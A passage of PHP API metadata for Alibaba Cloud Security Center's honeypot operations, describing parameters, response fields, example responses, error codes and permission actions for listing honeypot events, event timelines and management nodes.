\\"101.102.61.***\\",\\n \\"RiskLevel\\": \\"2\\"\\n }\\n ],\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 55,\\n \\"Count\\": 20\\n },\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\",\\n \\"RequestId\\": \\"9915DC4D-B4DA-5140-8138-FD80636*****\\",\\n \\"HttpStatusCode\\": 200\\n}","type":"json"}]', 'title' => 'ListHoneypotAttackerSource', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:ListHoneypotAttackerSource', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'ListHoneypotEventFlows' => [ 'methods' => ['get', 'post'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'list', 'abilityTreeCode' => '129271', 'abilityTreeNodes' => ['FEATUREsas731ZAS'], ], 'parameters' => [ [ 'name' => 'Dealed', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'Specifies whether the event has been handled. Valid values:'."\n" .'- **y**: Handled. '."\n" .'- **n**: Unhandled. '."\n" .'- **a**: All.', 'type' => 'string', 'required' => false, 'example' => 'n'], ], [ 'name' => 'SecurityEventId', 'in' => 'query', 'schema' => ['description' => 'The ID of the alert event.'."\n" .'>You can call the [ListHoneypotEvents](~~ListHoneypotEvents~~) operation to obtain this parameter.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '7455818', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the current page in a paged query. Default value: **1**.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The maximum number of entries to return per page in a paged query. Default value: 100. If the PageSize parameter is left empty, 100 entries are returned by default.'."\n" .'> Do not leave PageSize empty.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], [ 'name' => 'RequestId', 'in' => 'query', 'schema' => ['description' => 'Invalid parameter.', 'type' => 'string', 'required' => false, 'example' => '9F4E6157-9600-5588-86B9-38F09067****', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the request and response. Default value: **zh**. Valid values:'."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'The paginated result data.', 'type' => 'object', 'properties' => [ 'HoneypotEventFlows' => [ 'description' => 'The list of attack timeline entries.', 'type' => 'array', 'items' => [ 'description' => 'The attack timeline information.', 'type' => 'object', 'properties' => [ 'SecurityEventId' => ['title' => '', 'description' => 'The unique ID of the attack event.', 'type' => 'integer', 'format' => 'int64', 'example' => '306527555'], 'HoneypotEventId' => ['description' => 'The attack event ID in string format.', 'type' => 'string', 'example' => '19bec028-d98b-45c4-a4d9-cc3d593f****', 'title' => ''], 'LastTime' => ['description' => 'The most recent time when the attack event occurred, in UNIX timestamp format.', 'type' => 'integer', 'format' => 'int64', 'example' => '1686622222000', 'title' => ''], 'FirstTime' => ['description' => 'The first time when the attack event occurred, in UNIX timestamp format.', 'type' => 'integer', 'format' => 'int64', 'example' => '1686621122000', 'title' => ''], 'EventConnection' => ['description' => 'The unique ID of the connection during the attack.', 'type' => 'string', 'example' => 'fd7f1ff4-0c4b-41cb-99ad-0724349d****', 'title' => ''], 'AgentId' => ['description' => 'The ID of the probe.', 'type' => 'string', 'example' => 'd3c0dafa-5059-4eb0-8c28-7d40f58*****', 'title' => ''], 'AgentName' => ['description' => 'The name of the probe.', 'type' => 'string', 'example' => 'hw-d***', 'title' => ''], 'HoneypotId' => ['description' => 'The ID of the honeypot.', 'type' => 'string', 'example' => '911df9d6fe20451c059edbcffa1d1c33452f6a71e59d4826da067af224*****', 'title' => ''], 'HoneypotName' => ['description' => 'The name of the honeypot.', 'type' => 'string', 'example' => 'hw-zhi*****', 'title' => ''], 'DockerId' => ['description' => 'The ID of the container.', 'type' => 'string', 'example' => 'eca09895****', 'title' => ''], 'DstIp' => ['description' => 'The destination IP address.', 'type' => 'string', 'example' => '112.126.205.***', 'title' => ''], 'DstPort' => ['description' => 'The destination port.', 'type' => 'integer', 'format' => 'int32', 'example' => '80', 'title' => ''], 'SrcIp' => ['description' => 'The attack source IP address.', 'type' => 'string', 'example' => '121.41.48.***', 'title' => ''], 'SrcMac' => ['description' => 'The source MAC address of the attack.', 'type' => 'string', 'example' => '00:0C:29:CA:**:**', 'title' => ''], 'SrcPort' => ['description' => 'The source port number.', 'type' => 'integer', 'format' => 'int32', 'example' => '80', 'title' => ''], 'TypeId' => ['description' => 'The ID of the attack type.', 'type' => 'string', 'example' => 'web_access', 'title' => ''], 'RiskLevel' => ['description' => 'The risk level. Valid values:'."\n" ."\n" .'- **2**: Low.'."\n" .'- **3**: Medium.'."\n" .'- **4**: High.', 'type' => 'string', 'example' => '4', 'title' => ''], 'Extra' => ['description' => 'The extended information of the attack payload.', 'type' => 'string', 'example' => '{\\"payload\\":{\\"format\\":\\"line\\",\\"name\\":{\\"cn\\":\\"\\",\\"en\\":\\"payload\\"},\\"value\\":\\"\\"},\\"uid\\":{\\"format\\":\\"line\\",\\"name\\":{\\"cn\\":\\"\\",\\"en\\":\\"\\"},\\"uid\\":\\"5fa2ece9-aa08-4bbd-a272-5d27*********\\",\\"value\\":\\"\\"}}', 'title' => ''], 'Extra1' => ['description' => 'The VPC extended information.', 'type' => 'string', 'example' => '{\\"vpc_id\\":\\"\\",\\"vpc_dest_port\\":\\"\\",\\"vpc_dest_ip\\":\\"\\"}', 'title' => ''], 'Uid' => ['description' => 'The unique ID of a single attack action within the attack event.', 'type' => 'string', 'example' => '5fa2ece9-aa08-4bbd-a272-5d27d1c6*****', 'title' => ''], 'Status' => ['description' => 'The handling status of the attack event. Valid values:'."\n" ."\n" .'- **1**: Pending.'."\n" .'- **2**: Ignored.'."\n" .'- **4**: Confirmed.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'FileOssUrl' => ['description' => 'The OSS URL of the file.', 'type' => 'string', 'example' => 'https://pop-test-file-upload.oss-cn-beijing.aliyuncs.com/5626_26331*****', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'PageInfo' => [ 'description' => 'The paging information for the query.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the current page in the paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The maximum number of entries displayed per page in the paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries.', 'type' => 'integer', 'format' => 'int32', 'example' => '78', 'title' => ''], 'Count' => ['description' => 'The number of entries on the current page.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], ], 'title' => '', 'example' => '', ], 'Success' => ['description' => 'Indicates whether the call was successful. Valid values:'."\n" .'- **true**: Successful.'."\n" .'- **false**: Failed.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The result code. A value of **200** indicates success. Any other value indicates failure. You can use this field to determine the cause of the failure.', 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The response message.', 'type' => 'string', 'example' => 'successful', 'title' => ''], 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '9F4E6157-9600-5588-86B9-38F09067****', 'title' => ''], 'HttpStatusCode' => ['description' => 'The HTTP status code.', 'type' => 'integer', 'format' => 'int32', 'example' => '200', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'IllegalParam', 'errorMessage' => 'Illegal param', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Retrieve honeypot attack event timeline', 'summary' => 'Retrieves the details of a honeypot attack event.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'list', 'ramAction' => [ 'action' => 'yundun-sas:ListHoneypotEventFlows', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"HoneypotEventFlows\\": [\\n {\\n \\"SecurityEventId\\": 306527555,\\n \\"HoneypotEventId\\": \\"19bec028-d98b-45c4-a4d9-cc3d593f****\\",\\n \\"LastTime\\": 1686622222000,\\n \\"FirstTime\\": 1686621122000,\\n \\"EventConnection\\": \\"fd7f1ff4-0c4b-41cb-99ad-0724349d****\\",\\n \\"AgentId\\": \\"d3c0dafa-5059-4eb0-8c28-7d40f58*****\\",\\n \\"AgentName\\": \\"hw-d***\\",\\n \\"HoneypotId\\": \\"911df9d6fe20451c059edbcffa1d1c33452f6a71e59d4826da067af224*****\\",\\n \\"HoneypotName\\": \\"hw-zhi*****\\",\\n \\"DockerId\\": \\"eca09895****\\",\\n \\"DstIp\\": \\"112.126.205.***\\",\\n \\"DstPort\\": 80,\\n \\"SrcIp\\": \\"121.41.48.***\\",\\n \\"SrcMac\\": \\"00:0C:29:CA:**:**\\",\\n \\"SrcPort\\": 80,\\n \\"TypeId\\": \\"web_access\\",\\n \\"RiskLevel\\": \\"4\\",\\n \\"Extra\\": \\"{\\\\\\\\\\\\\\"payload\\\\\\\\\\\\\\":{\\\\\\\\\\\\\\"format\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"line\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"name\\\\\\\\\\\\\\":{\\\\\\\\\\\\\\"cn\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"en\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"payload\\\\\\\\\\\\\\"},\\\\\\\\\\\\\\"value\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"\\\\\\\\\\\\\\"},\\\\\\\\\\\\\\"uid\\\\\\\\\\\\\\":{\\\\\\\\\\\\\\"format\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"line\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"name\\\\\\\\\\\\\\":{\\\\\\\\\\\\\\"cn\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"en\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"\\\\\\\\\\\\\\"},\\\\\\\\\\\\\\"uid\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"5fa2ece9-aa08-4bbd-a272-5d27*********\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"value\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"\\\\\\\\\\\\\\"}}\\",\\n \\"Extra1\\": \\"{\\\\\\\\\\\\\\"vpc_id\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"vpc_dest_port\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"vpc_dest_ip\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"\\\\\\\\\\\\\\"}\\",\\n \\"Uid\\": \\"5fa2ece9-aa08-4bbd-a272-5d27d1c6*****\\",\\n \\"Status\\": 1,\\n \\"FileOssUrl\\": \\"https://pop-test-file-upload.oss-cn-beijing.aliyuncs.com/5626_26331*****\\"\\n }\\n ],\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 78,\\n \\"Count\\": 20\\n },\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\",\\n \\"RequestId\\": \\"9F4E6157-9600-5588-86B9-38F09067****\\",\\n \\"HttpStatusCode\\": 200\\n}","type":"json"}]', ], 'ListHoneypotEvents' => [ 'summary' => 'Retrieves intrusion events of a honeypot.', 'methods' => ['get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'list', 'abilityTreeCode' => '129270', 'abilityTreeNodes' => ['FEATUREsasY2S7U2'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'Dealed', 'in' => 'formData', 'schema' => ['title' => '', 'description' => 'The event status. Valid values:'."\n" ."\n" .'- **y**: Handled.'."\n" .'- **n**: Unhandled.'."\n" .'- **a**: All.', 'type' => 'string', 'required' => false, 'example' => 'y'], ], [ 'name' => 'AlarmEventId', 'in' => 'formData', 'schema' => ['description' => 'The ID of the alert.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1259925', 'title' => ''], ], [ 'name' => 'RiskLevelList', 'in' => 'formData', 'style' => 'repeatList', 'schema' => [ 'description' => 'The list of risk levels.', 'type' => 'array', 'items' => ['description' => 'The risk level. Valid values:'."\n" ."\n" .'- **2**: Low risk.'."\n" .'- **3**: Medium risk.'."\n" .'- **4**: High risk.', 'type' => 'string', 'required' => false, 'example' => '4', 'title' => ''], 'required' => false, 'maxItems' => 10, 'title' => '', 'example' => '', ], ], [ 'name' => 'HoneypotIdList', 'in' => 'formData', 'style' => 'repeatList', 'schema' => [ 'description' => 'The list of honeypot IDs.', 'type' => 'array', 'items' => ['description' => 'The honeypot ID.', 'type' => 'string', 'required' => false, 'example' => '911df9d6fe20451c059edbcffa1d1c33452f6a71e59d4826da067af224*****'."\n", 'title' => ''], 'required' => false, 'maxItems' => 10, 'title' => '', 'example' => '', ], ], [ 'name' => 'AgentIdList', 'in' => 'formData', 'style' => 'repeatList', 'schema' => [ 'description' => 'The list of probe IDs.', 'type' => 'array', 'items' => ['description' => 'The probe ID.', 'type' => 'string', 'required' => false, 'example' => 'd3c0dafa-5059-4eb0-8c28-7d40f58*****'."\n", 'title' => ''], 'required' => false, 'maxItems' => 10, 'title' => '', 'example' => '', ], ], [ 'name' => 'CurrentPage', 'in' => 'formData', 'schema' => ['description' => 'The page number of the current page in a paging query.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'formData', 'schema' => ['description' => 'The maximum number of entries per page in a paging query. Default value: **20**.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '10', 'title' => ''], ], [ 'name' => 'RequestId', 'in' => 'formData', 'schema' => ['description' => 'The ID of the request. Alibaba Cloud generates a unique identifier for each request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'required' => false, 'example' => '2F9CE167-58D5-5DA6-AA3B-923EED02****', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'formData', 'schema' => ['description' => 'The language of the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'SrcIp', 'in' => 'query', 'schema' => ['description' => 'The source IP address of the attack.', 'type' => 'string', 'required' => false, 'example' => '185.237.96.***', 'title' => ''], ], [ 'name' => 'PortraitId', 'in' => 'query', 'schema' => ['description' => 'The ID of the attacker portrait.', 'type' => 'string', 'required' => false, 'example' => 'cd48604a-1694-4f03-ade0-ec6994c3*****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'The result data of the paging query.', 'type' => 'object', 'properties' => [ 'HoneypotEvents' => [ 'description' => 'The list of honeypot attack events.', 'type' => 'array', 'items' => [ 'description' => 'The honeypot attack event.', 'type' => 'object', 'properties' => [ 'SrcIp' => ['description' => 'The source IP address of the attack.', 'type' => 'string', 'example' => '192.168.62.***', 'title' => ''], 'DstIp' => ['description' => 'The destination IP address of the attack.', 'type' => 'string', 'example' => '112.126.205.***', 'title' => ''], 'AgentId' => ['description' => 'The probe ID.', 'type' => 'string', 'example' => '27d44bd5815d401992ea672874d9****', 'title' => ''], 'AgentName' => ['description' => 'The name of the probe.', 'type' => 'string', 'example' => '1193474_test_****', 'title' => ''], 'Protocol' => ['description' => 'The protocol. Valid values:'."\n" ."\n" .'- **tcp**.'."\n" .'- **udp**.', 'type' => 'string', 'example' => 'tcp', 'title' => ''], 'FirstTime' => ['description' => 'The timestamp of the first occurrence.', 'type' => 'integer', 'format' => 'int64', 'example' => '1692670297', 'title' => ''], 'LastTime' => ['description' => 'The timestamp of the most recent occurrence.', 'type' => 'integer', 'format' => 'int64', 'example' => '1676558664', 'title' => ''], 'Location' => ['description' => 'The region.', 'type' => 'string', 'example' => '北京市', 'title' => ''], 'RiskLevel' => ['description' => 'The risk level. Valid values:'."\n" ."\n" .'- **2**: Low risk.'."\n" .'- **3**: Medium risk.'."\n" .'- **4**: High risk.', 'type' => 'string', 'example' => '4', 'title' => ''], 'HoneypotName' => ['description' => 'The name of the honeypot.', 'type' => 'string', 'example' => '主机 tcp监听****', 'title' => ''], 'AlarmEventId' => ['description' => 'The ID of the alert event.', 'type' => 'integer', 'format' => 'int64', 'example' => '1900752', 'title' => ''], 'SecurityEventId' => ['description' => 'The unique ID of the attack event.', 'type' => 'integer', 'format' => 'int64', 'example' => '70427821', 'title' => ''], 'MergeFieldList' => [ 'description' => 'The list of extended field key-value pairs.', 'type' => 'array', 'items' => [ 'description' => 'The extended field key-value pair.', 'type' => 'object', 'properties' => [ 'FieldType' => ['description' => 'The field type.', 'type' => 'string', 'example' => 'level2_item1', 'title' => ''], 'FieldKey' => ['description' => 'The key of the field.', 'type' => 'string', 'example' => 'type', 'title' => ''], 'FieldValue' => ['description' => 'The value of the field key.', 'type' => 'string', 'example' => 'web_access', 'title' => ''], 'FieldExtInfo' => ['description' => 'The supplementary information of the field.', 'type' => 'string', 'example' => 'data', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'PageInfo' => [ 'description' => 'The paging information.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the current page in a paging query.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The maximum number of entries per page in a paging query.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries.', 'type' => 'integer', 'format' => 'int32', 'example' => '30', 'title' => ''], 'Count' => ['description' => 'The number of entries on the current page in a paging query.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'LastRowKey' => ['description' => 'The key of the last entry.', 'type' => 'string', 'example' => 'CAESGgoSChAKDGNvbXBsZXRlVGltZRABCgQiAggAGAAiQAoJAGYXFWIAAAAACjMDLgAAADFTNzMyZDMwMzAzMDM1Mzc3Njc4MzA2ODY5NmI2YTY*********', 'title' => ''], 'NextToken' => ['description' => 'The NextToken value returned when the NextToken-based pagination method is used.', 'type' => 'string', 'example' => 'B604532DEF982B875E8360A6EFA3B***', 'title' => ''], ], 'title' => '', 'example' => '', ], 'RequestId' => ['description' => 'The ID of the request. Alibaba Cloud generates a unique identifier for each request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => 'FBD28009-6096-5E90-BFE6-62CCD67*****', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'IllegalParam', 'errorMessage' => 'Illegal param', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'List honeypot attack events', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'list', 'ramAction' => [ 'action' => 'yundun-sas:ListHoneypotEvents', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"HoneypotEvents\\": [\\n {\\n \\"SrcIp\\": \\"192.168.62.***\\",\\n \\"DstIp\\": \\"112.126.205.***\\",\\n \\"AgentId\\": \\"27d44bd5815d401992ea672874d9****\\",\\n \\"AgentName\\": \\"1193474_test_****\\",\\n \\"Protocol\\": \\"tcp\\",\\n \\"FirstTime\\": 1692670297,\\n \\"LastTime\\": 1676558664,\\n \\"Location\\": \\"北京市\\",\\n \\"RiskLevel\\": \\"4\\",\\n \\"HoneypotName\\": \\"主机 tcp监听****\\",\\n \\"AlarmEventId\\": 1900752,\\n \\"SecurityEventId\\": 70427821,\\n \\"MergeFieldList\\": [\\n {\\n \\"FieldType\\": \\"level2_item1\\",\\n \\"FieldKey\\": \\"type\\",\\n \\"FieldValue\\": \\"web_access\\",\\n \\"FieldExtInfo\\": \\"data\\"\\n }\\n ]\\n }\\n ],\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 30,\\n \\"Count\\": 20,\\n \\"LastRowKey\\": \\"CAESGgoSChAKDGNvbXBsZXRlVGltZRABCgQiAggAGAAiQAoJAGYXFWIAAAAACjMDLgAAADFTNzMyZDMwMzAzMDM1Mzc3Njc4MzA2ODY5NmI2YTY*********\\",\\n \\"NextToken\\": \\"B604532DEF982B875E8360A6EFA3B***\\"\\n },\\n \\"RequestId\\": \\"FBD28009-6096-5E90-BFE6-62CCD67*****\\"\\n}","type":"json"}]', ], 'ListHoneypotNode' => [ 'summary' => 'Queries the information about management nodes.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasY2S7U2'], ], 'parameters' => [ [ 'name' => 'NodeName', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The name of the management node.'."\n", 'type' => 'string', 'required' => false, 'example' => 'cyct_cnymu'], ], [ 'name' => 'NodeId', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The ID of the management node.'."\n", 'type' => 'string', 'required' => false, 'example' => '7d110ca6-05ee-4149-8042-13ad1a41fd****'], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The number of the page to return.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The number of entries to return on each page.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'title' => 'PageResult', 'description' => 'PageResult'."\n", 'type' => 'object', 'properties' => [ 'HoneypotNodeList' => [ 'description' => 'An array that consists of the information about the management nodes.'."\n", 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'NodeId' => ['title' => '', 'description' => 'The ID of the management node.'."\n", 'type' => 'string', 'example' => '7d110ca6-05ee-4149-8042-13ad1a41fd****'], 'NodeName' => ['title' => '', 'description' => 'The name of the management node.'."\n", 'type' => 'string', 'example' => 'cyct_cnymu'], 'HoneypotTotalCount' => ['title' => '', 'description' => 'The maximum number of honeypots that can be deployed to the management node.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '10'], 'HoneypotUsedCount' => ['title' => '', 'description' => 'The number of honeypots that are deployed to the management node.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '2'], 'ProbeTotalCount' => ['title' => '', 'description' => 'The maximum number of probes that can be deployed for the management node.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '5'], 'ProbeUsedCount' => ['title' => '', 'description' => 'The number of probes that are deployed for the management node.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '2'], 'TotalStatus' => ['title' => '', 'description' => 'The status of the management node. Valid values:'."\n" ."\n" .'* **1**: normal'."\n" .'* **2**: abnormal'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1'], 'EcsInstanceId' => ['title' => '', 'description' => 'The ID of the instance.'."\n", 'type' => 'string', 'example' => 'i-bp1fs3qsc1msa3512k****'], 'CreateTime' => ['description' => 'The time when the management node was created.'."\n", 'type' => 'string', 'example' => '2022-08-04 15:52:56', 'title' => ''], 'SecurityGroupProbeIpList' => [ 'description' => 'An array consisting of the CIDR blocks that are allowed to access the management node.'."\n", 'type' => 'array', 'items' => ['description' => 'The CIDR block that is allowed to access the management node.'."\n", 'type' => 'string', 'example' => '0.0.0.0/0', 'title' => ''], 'title' => '', 'example' => '', ], 'AllowHoneypotAccessInternet' => ['description' => 'Indicates whether a honeypot is allowed to access the Internet. Valid values:'."\n" ."\n" .'* **true**: The honeypot is allowed to access the Internet.'."\n" .'* **false**: The honeypot is not allowed to access the Internet.'."\n", 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'DefaultNode' => ['description' => 'The type of the management node. Default value: **false**. Valid values:'."\n" ."\n" .'* **false**: non-default type'."\n" .'* **true**: default type'."\n", 'type' => 'boolean', 'example' => 'false', 'title' => ''], 'NodeIp' => ['description' => 'The IP address of the management node.'."\n", 'type' => 'string', 'example' => '119.180.XX.XX', 'title' => ''], 'UpgradeAvailable' => ['description' => 'Indicates whether the management node can be upgraded. Valid values:'."\n" ."\n" .'* **false**: no'."\n" .'* **true**: yes'."\n", 'type' => 'boolean', 'example' => 'true', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'PageInfo' => [ 'description' => 'The pagination information.'."\n", 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the returned page.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The number of entries returned per page.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries returned.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '149', 'title' => ''], 'Count' => ['description' => 'The number of entries returned on the current page.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], ], 'title' => '', 'example' => '', ], 'Success' => ['description' => 'Indicates whether the request was successful. Valid values:'."\n" ."\n" .'* **true**: The request was successful.'."\n" .'* **false**: The request failed.'."\n", 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The status code returned. The status code **200** indicates that the request was successful. Other status codes indicate that the request failed. You can identify the cause of the failure based on the status code.'."\n", 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The error message returned.'."\n", 'type' => 'string', 'example' => 'successful', 'title' => ''], 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => '337BEA70-B03D-5370-8420-436F3FCD9924', 'title' => ''], 'HttpStatusCode' => ['description' => 'The HTTP status code returned.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '200', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"HoneypotNodeList\\": [\\n {\\n \\"NodeId\\": \\"7d110ca6-05ee-4149-8042-13ad1a41fd****\\",\\n \\"NodeName\\": \\"cyct_cnymu\\",\\n \\"HoneypotTotalCount\\": 10,\\n \\"HoneypotUsedCount\\": 2,\\n \\"ProbeTotalCount\\": 5,\\n \\"ProbeUsedCount\\": 2,\\n \\"TotalStatus\\": 1,\\n \\"EcsInstanceId\\": \\"i-bp1fs3qsc1msa3512k****\\",\\n \\"CreateTime\\": \\"2022-08-04 15:52:56\\",\\n \\"SecurityGroupProbeIpList\\": [\\n \\"0.0.0.0/0\\"\\n ],\\n \\"AllowHoneypotAccessInternet\\": true,\\n \\"DefaultNode\\": false,\\n \\"NodeIp\\": \\"119.180.XX.XX\\",\\n \\"UpgradeAvailable\\": true\\n }\\n ],\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 149,\\n \\"Count\\": 2\\n },\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\",\\n \\"RequestId\\": \\"337BEA70-B03D-5370-8420-436F3FCD9924\\",\\n \\"HttpStatusCode\\": 200\\n}","type":"json"}]', 'title' => 'ListHoneypotNode', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 